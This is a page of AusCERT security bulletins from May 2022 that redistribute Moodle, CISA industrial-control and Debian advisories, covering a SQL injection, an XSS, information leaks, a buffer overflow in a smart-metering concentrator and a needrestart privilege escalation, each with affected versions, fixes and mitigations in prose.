M8L2Me1L80/QXeUzlG/U1xqwndp9HYN166QaKNDYVKlzhTuz272nIxyhz55hqSDY 7yFKz1lqYBUb2svA7jqhTbwPi8JiNppASQeZuAQUsiLzMILfQpOzAaP3o7I6tfsN FmyiMd+y/MM9uPw1G6hV7dPvLpBLsSvQ0ySXNmrRVBBjBF52asI2QRjjNqWoRdBZ B5OrRoazk35oN/cFU3KXc3FZ33OhpKpnXZWr1/lhuX0Ypjjf/td94kuB2OEw4624 Q+2L8VIdrcp2MLu8PzisDMy+R/zb2fRDvlw5V4hJHL56RyS2HBktljAKcPerOvdj lipsBzh5YAaNRBNMtH3P82RjjB6tcRvpTVAbziIyBOPLkOmVVFD4reumlejHZUjQ sxWgwPoCdSnWJI3kBeoYuEayj1ZO1Pcti0oxJCTvvY18szk+GoXWPd0SmdDX4zMX b4YYwzDNZhmp6UlSEuw+l/9prgXtULA0cynBiSjgjW6b/MjOIRuAnNMHPbrkkUJ9 uykzVMO9z2WAxkQA+7S2OdVyWl+s/NEhTYX8bK9JS1BWj1UGUmcdkn466WxckMw9 Kqbayz7bWDUV4mRdhlUBuaVkAII16XODmwhBRwdcO8h7bJF7GQ2Vd1Q5yLFY+DIa jV+rAznIDok= =bZ4c -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2441 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2441 MSA-22-0013: SQL injection risk in badge award criteria 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Moodle Publisher: Moodle Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-30599 Original Bulletin: https://moodle.org/mod/forum/discuss.php?d=434581&parent=1748725 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- MSA-22-0013: SQL injection risk in badge award criteria An SQL injection risk was identified in Badges code relating to configuring criteria. NOTE: in Moodle 4.0, 3.11.6, 3.10.10 and 3.9.13, access to this vulnerability was available to site administrators only. In earlier versions, access to the relevant capability was also limited to teachers and managers by default. Severity/Risk: Serious Versions affected: 4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and earlier unsupported versions Versions fixed: 4.0.1, 3.11.7, 3.10.11 and 3.9.14 Reported by: Michael Dunstan Workaround: In versions earlier than Moodle 4.0, 3.11.6, 3.10.10 and 3.9.13, remove the moodle/badges:configurecriteria capability from users to prevent them accessing the affected functionality until the patch is applied (in newer versions this is not necessary). CVE identifier: CVE-2022-30599 Changes (master): http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74333 Tracker issue: MDL-74333 SQL injection risk in badge award criteria - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRtcskNZI30y1K9AQhVPxAAniZ0MwK3FJncAH7mIvI5U5Gd0vOfhk4t dN9P/WaZey92wIm3Ow0mlcEx4sPLmdfLwL7dcdWcM4diXzpY9KGRJAStFPX7JaLR n4EQLaqwzqSawR/HXP5tBgK8LXwo5Atiojq2Uv791VwOPBVyNGGxDbSn8bspAJbX 8I842latNo4Lhw/RodKyQeE7J+Le1eemtUFgUX+IMrWMw0LBuBtu3g/o8DYLsO/S 1oQlQfp9p4RZNG1DAjaBl82i79aEY6tO6mtLuxwWXyk93O52wfM3ua+PSFJigTLy ZDftum68v0tQvNKQFdM37V/LmRzMje6QeT2iMu0AHK320eSJdvuSpKz2zSamV8sg LEK31eEFqu3eaP8Rt6Kavak8pzOcDqv/B0AxVKSEg/4IjDze0kdH5aR84bVMC79J BpakOyBVy996RsS0IQ3qBWgCUbyomDSA/CRF+i22kxtEqAmg1nhIBpW8mnVLu7xj eZlG3Xseq5HlTjOcMdVqzWfHFjIdrZSvB/MQEfk6SMjrhqpUwF/U3vLjNrxw+pK1 aTzG8N0hAF0lQc20JfIjdQPzUtapQAgjapxpIFuesQBicGkuNt9YheoQ6+zFnFmM GANmRj/o1WWtPrrZfS6lrgF89MPTGjlvL+pAAlWJ1upw+gYM92iBpKcZuTRnzNgz 0DFYPgRaaCU= =BcaB -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2440 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2440 MSA-22-0012: Global search results reveal authors of content unexpectedly for some activities 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Moodle Publisher: Moodle Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-30598 Original Bulletin: https://moodle.org/mod/forum/discuss.php?d=434580&parent=1748724 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- MSA-22-0012: Global search results reveal authors of content unexpectedly for some activities Global search results could include author information on some activities where a user may not otherwise have access to it. Severity/Risk: Minor Versions affected: 4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and earlier unsupported versions Versions fixed: 4.0.1, 3.11.7, 3.10.11 and 3.9.14 Reported by: Catalina CVE identifier: CVE-2022-30598 Changes (master): http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-71623 Tracker issue: MDL-71623 Global search results reveal authors of content unexpectedly for some activities - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRtYMkNZI30y1K9AQjVlA//VjyAx1Q7FrIIr89aovIW3/865H/toShe hc/Z8B6Vr30YCxt2FEhpfd2kP+gTcxgFz4BbJFALLvSyaUcxvOHBWe461pfmp6K+ 7h3t+ca/pAoMVubSMWc27zC2MN/OIwNYRYgCm5nVh6tcMMPOwQsxkDS/M1pnnZSi NsCy1PWKMEiyyadnobr577bXnx6MkOWynJjt8u2NtQKmpD+8J3f0rgGAaFBd88ly g+lbe2/XCClP9mxPpwPbKI43ZVgW4AVE32Ac+eV+SvYK8vhsudm08UNkTGS1E3ei ha2aB0pTRlG8X+cr+93efX81hRj/2C1Sa+RSRFThC4cLlzoYi/z3dHocRryBXY8d 33T2kU8NWmjGU1ac+BYRZkw8wHBsWaokR/3wAkqbOfuV09H9AqF/J6S898X4IVMG kvsgItLuMwMtTawmzv0SYA/KqIOft53NNXbmd9mYX+mC/msUk1actCR6XwUpKFHQ XDGODCPrWlh4Yfs00iCFWhQws/ReePp9a4v3hRhubtCjEbftYDGOJwyEuR/kCwk1 K5zENs7pttupqeCphtTn88H3dtWa32b1Oyw29x/qhBl2altgIratdla/spiwGRJb U1sEzRgSwD432MBv+ipk0zYQCCWt4bpEgDBbR1zEEaQa71+Jqq9FG5S3muaCyxpA lm81F9XCKTY= =1D3n -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2439 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2439 MSA-22-0011: Description field hidden by user policies (hiddenuserfields) is still visible 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Moodle Publisher: Moodle Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-30597 Original Bulletin: https://moodle.org/mod/forum/discuss.php?d=434579&parent=1748723 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- MSA-22-0011: Description field hidden by user policies (hiddenuserfields) is still visible The description user field was not hidden when being set as a hidden user field. Severity/Risk: Minor Versions affected: 4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and earlier unsupported versions Versions fixed: 4.0.1, 3.11.7, 3.10.11 and 3.9.14 Reported by: Bo Foght CVE identifier: CVE-2022-30597 Changes (master): http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74318 Tracker issue: MDL-74318 Description field hidden by user policies (hiddenuserfields) is still visible - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRtT8kNZI30y1K9AQjVMhAAkUFK8UMDu8WLO+kQ6G/Fo+MuI0L51ii8 8B73bny3bFIsblFfy9G7RpV5I1A5uVon15i4XHSfYMI8+p/C1CR1/mNuxkVg92X6 MS8AWDqyCWAdi4aYhxYbeNS82M/pVEHu+x7efBE13AalsRAYbcqcUYu6Qbmb9ELq Kh39v11kOCTz+j1ylnxQ6pQMq8+yU1eIZSSNkLuluyZM7SSvqOpkhYvqrW+qRKlR vc+2lpHiTTZOHf52ePop9hq+wsQ8vhfj3YAAnferB4ARy+Dm6u4cVvsWdZXMempB JHgdMThsQ5TL3CAOXew3cFpy9vcO/3dW0vdV+r1J2WCvtaYNLvpcDGy1tbjgP1hs HbPjc5yfVJWCns7V7AJg1kaMU/PByEm0oew8BjtE2E1YCpI3XJoYgHdBwvF+Snh4 Zi798seKYF+KoWa9qASO5YHmGydMva+NXNWyikHmmuRwCrpEXKtNKwGqoEj/bW04 CchzoNzfoSzhVnO/tiz6Kb2p4Civ+Id3+RhynlkMEIY1ozi5XbD9VDQ48DZjAaJA 2K9GhZ8VwuPbciaSnK3Sr36DUT101Yz/bwqVr4ucaBYlujxq3DUU3tIYlewT+cPq LiTO4fw1CT2V/9dBYjvECnGHC4uTreKfGsIUtUWZZRhrBTMkAnXfTsPtE7TQFQc3 ADpwp3V2SoA= =C/rO -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2426 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2438 MSA-22-0010: Stored XSS in assignment bulk marker allocation form via user ID number 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Moodle Publisher: Moodle Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-30596 Original Bulletin: https://moodle.org/mod/forum/discuss.php?d=434578&parent=1748722 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- MSA-22-0010: Stored XSS in assignment bulk marker allocation form via user ID number ID numbers displayed when bulk allocating markers to assignments required additional sanitizing to prevent a stored XSS risk. Severity/Risk: Minor Versions affected: 4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and earlier unsupported versions Versions fixed: 4.0.1, 3.11.7, 3.10.11 and 3.9.14 Reported by: Paul Holden CVE identifier: CVE-2022-30596 Changes (master): http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74204 Tracker issue: MDL-74204 Stored XSS in assignment bulk marker allocation form via user ID number - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRtP8kNZI30y1K9AQj/Pg//RsiUEtX7icRbD7HJl3Dw1O58o/ZAB3y/ DsZJq1QPs7EpSUib8kH2cuJW0uf+vPWzvLcF0qD/7p+AyYUQgC4hMMYM7zDcgUKU 8eQwDxezqU7sE+KyzYqashifN/LqqZQTC4mQlgiwNBt1ChsgZLc6DKVjbfTLE2sH eHO1AfgeayckbtqmwVJMxBqRbTzkfIbo8pIhMrxjvvELgDjt5FsSaDl/JrsfYLFi dRouxemqOSByg+9+5tAvX53KNqnvkG0Lpb7p1M8dhh5wHramMcAK6Zx49ejCEZLk sb3WR2XvjFctjdmmigo7CrqNrcv5x+Mkp7vL+hLX7E9Aa7gNAi+4g7oig2/bTPSE +cAfMbsUzShz6bSycT+i4X5EWcfy4DDGkx9noS7U5eg8w9vHNxA4k6yfVAa+H+IV LukesilJnAG7AnFvAaOxcSpLZcTCUjBHULIGXpxWc5Y8baqq0ZsifKJI1Rr/DcEH 4mwVmmqvkqI6qmbjavFBgTX77sFTNXuB6nPNV+gB4u8J18aok/vMgPpTyNPc6URp MkXZ3c7qN2bO6uOF7+ithkX8VkVR4ikaJH35Go9xdmOgQXllF0P2jgU2f44Zskfs KCpFShmSqpsL+28FylAWtxNOXf3ApxUzgPsSd12aNG4s37w7g5PZb+i+0thjsdpX MQE3aEN2IM0= =MYhx -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2437 - [Appliance] Circutor COMPACT DC-S BASIC: CVSS (Max): 6.8

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2437 Advisory (icsa-22-137-01) Circutor COMPACT DC-S BASIC 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Circutor COMPACT DC-S BASIC Publisher: ICS-CERT Operating System: Network Appliance Resolution: Mitigation CVE Names: CVE-2022-1669 Original Bulletin: https://us-cert.cisa.gov/ics/advisories/icsa-22-137-01 Comment: CVSS (Max): 6.8 CVE-2022-1669 (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H) CVSS Source: ICS-CERT Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- ICS Advisory (ICSA-22-137-01) Circutor COMPACT DC-S BASIC Original release date: May 17, 2022 Legal Notice All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/ . 1. EXECUTIVE SUMMARY o CVSS v3 6.8 o ATTENTION: Exploitable remotely/low attack complexity o Vendor: Circutor o Equipment: COMPACT DC-S BASIC o Vulnerability: Stack-based Buffer Overflow 2. RISK EVALUATION Successful exploitation of this vulnerability could cause a buffer overflow condition resulting in remote code execution. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Circutor COMPACT DC-S BASIC, a smart metering concentrator, are affected: o Circutor COMPACT DC-S BASIC: CIR_CDC_v1.2.17 3.2 VULNERABILITY OVERVIEW 3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121 A buffer overflow vulnerability has been detected in the firewall function of the device management web portal. The device runs a CGI binary (index.cgi) to offer a management web application. Once authenticated with valid credentials in this web portal, a potential attacker could submit any "Address" value and it would be copied to a second variable with a "strcpy" vulnerable function without checking its length. Because of this, it is possible to send a long address value to overflow the process stack, controlling the function return address. CVE-2022-1669 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been assigned; the CVSS vector string is ( AV:N/AC:H/PR:L/UI:N/S:U/C:N/ I:H/A:H ). 3.3 BACKGROUND o CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing o COUNTRIES/AREAS DEPLOYED: Worldwide o COMPANY HEADQUARTERS LOCATION: Spain 3.4 RESEARCHER Angel Garcia Moreno reported this vulnerability to CISA. 4. MITIGATIONS Circutor has not responded to requests to work with CISA to mitigate this vulnerability. Users of these affected products are invited to contact Circutor customer support for additional information. CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should: o Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet . o Locate control system networks and remote devices behind firewalls and isolate them from the business network. o When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies . Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies . Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents. No known public exploits specifically target this vulnerability. For any questions related to this report, please contact the CISA at: Email: CISAservicedesk@cisa.dhs.gov Toll Free: 1-888-282-0870 CISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRqqMkNZI30y1K9AQgRGw//ZWq4FSpewtFl2OfmpDgTSoDBK59qGqbY 3UxBTMXePuCQowASaMvS//hGLKMOZnbqOCWwLDAOF25yQSdbF961B4sn4k8ZjR/4 sdHpxTopA90X65OF++FqefooMc2HXGH47oruMKoTdkhMGKT3c0osLV6gmqaM3+Pk +GzGBHpq3FqAZjtw2NSJmWZ9UqgA2gwhZyM9tnsw99z89fFemJQf72VEDiI+tG+U TrQlmknmq3OOkGNhAqGdbZMoGbr14h4XmW1L+2kpMGtQIW2C6bDTDvB8G3YFCznw S6LCyrZtoWPGKgyr5q9XtpHH8pdPPb+uPyFBZpGj+V3k12h6hFeN+EDvx9+rJPFI XRogUdQQl9kN6hdYd688jEPH/cZomYYZwkkCU+1jxL2inPbFO4shO+8hT3IgNY24 gX5/pQxqjQJjDsaktzvF4Xnn+Z6rBQS2cXtCUZLxzmwgPciwFl6a30NqayrlAUaa 7JTr1iGasfeb3r2jIBzTCZv8TwVQBAGuKyBHP2spZt/FKg9Vfi+4GvNvJwMYSKaF FjSsnU04venjolphczToRFA+uHIVApiuUMgV211WHgyEzj9eyfDZY/QEuSAy+9GZ JZTcrN6VePWN2hFnTJ4/4gSIMeA0t72dQ8rRK3bnAguVlAbYaED/RH7nNKr7eC77 KsEoYwQCEec= =DL+F -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2436 - [Debian] needrestart: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2436 needrestart security update 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: needrestart Publisher: Debian Operating System: Debian GNU/Linux Resolution: Patch/Upgrade CVE Names: CVE-2022-30688 Original Bulletin: https://lists.debian.org/debian-security-announce/2022/msg00105.html Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - - ------------------------------------------------------------------------- Debian Security Advisory DSA-5137-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso May 17, 2022 https://www.debian.org/security/faq - - ------------------------------------------------------------------------- Package : needrestart CVE ID : CVE-2022-30688 Jakub Wilk discovered a local privilege escalation in needrestart, a utility to check which daemons need to be restarted after library upgrades. Regular expressions to detect the Perl, Python, and Ruby interpreters are not anchored, allowing a local user to escalate privileges when needrestart tries to detect if interpreters are using old source files. For the oldstable distribution (buster), this problem has been fixed in version 3.4-5+deb10u1. For the stable distribution (bullseye), this problem has been fixed in version 3.5-4+deb11u1. We recommend that you upgrade your needrestart packages. For the detailed security status of needrestart please refer to its security tracker page at: https://security-tracker.debian.org/tracker/needrestart Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org - -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmKDw1JfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0RT8hAAoA3yInyXth3hYy2+Na/+bhNvNZ9nxHHS+Qch3TooRuraezIe42OQ9wVx XDiQ5rlqW8uLLC78g5IK7sg0sAyZDFyEJK/kp66FHff0bO1u9+uzA/yuFdNccfo2 deHo4HpstwdHhFh2jYc10Nws7D2vOnRO9/NcHT7wSH1j1bWUnbGNPBgy53hhHtlO rn7NIV4YcuYgq92tNIQ/DayYgZwQPqxEuqjAI8PNAtXxK5vGx3oB2unAnC7I3RcT Yno8OPzHa9J5me8vHbxH0hCGuhwftySO+pKZ69X+WeGmnf7gcCwxGe8YXUc28XRo /h2I/XMEHGyFlr7igr+hEPXkpwmFtww5kL+5M2HlYlNBe/ovV26qtctV6O5fANRv EtURtJvNf4m1f+UE81QyFNfcagpcx4xl0LALuu1Y1m4ID2ymaFECR62iZ5IRxm90 y9D2EqIlOx4ehAcCkYJex3B/R8kuLoVkZ8Q6iatpEV9hcLTePJB1tD6isJLPPKrs aUGx0E3zlp6jVgnv45/+unVdKPzoZduwTMHkQgY3hMlKl0L/NdFcO8Srxic+heja llPa6ptku+Px24af8ZZMEonYkXshzzE7XhLzJA4+RV3Vynnrj8bOoypGRswUN5I0 OzWeHcwOmJCO8CQkEHcYqrJ61/gn9kH1D7zD9Opyv8E3M9ZYumw= =Gz2y - -----END PGP SIGNATURE----- - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRqf8kNZI30y1K9AQjm5A/+PIlDZDiQfDWibYqOILl2Uy8Fk3WdhY0Z 6lM9vYpWcIdeJjPeYYntZFAmbu1PuoFJ3v2jzsxoo5oGNAVhat85eiPYn1KWzAxN 3JyyptWvtfWUd4Q0IwKmLtL11v2M2o7yW+9WBqPnzUlY1P2oAbP4O3DVGlr39b1V 46yVGSht5U0z8ZetGM54K6OQPwqvqrlMaMF8knAoImP3sp5BGbiG/UnlmU6aHnX4 9kBP6TaKcyDreJ/156zoExt+8FSARUuPtbP4GZUYAaISJO/cCky2I1BwrQw4cQ1F Ku/CfRpvqiQOJ1/Vg3wepQgt5Kb9emHYmZeFJYzUA5Bi8yjEomNXIO0wkI688E+F rTHOZluO5v/X7CqNAUiX7o4MsnAUlLmpwXIBbcWR8HDRhx2bpTAKuI8k73Ed0gdT 5xyqJxm+X1gqe/hiPg3zv92mLUDMuwCeKDoPeyWoJ2d36EwybfaSxTl31UrONQN+ bT71e+6sBSXci42Wb4zROeknM93knHnx6anq9SsHGeaiTkbxG4gmRoJwNv3KgRBx 4p12d1hShgJuMp4yQtqyIdiUT2SOOAmX7NCJFTeXRR+vWo3XCBFeL9TRnX3CKoR8 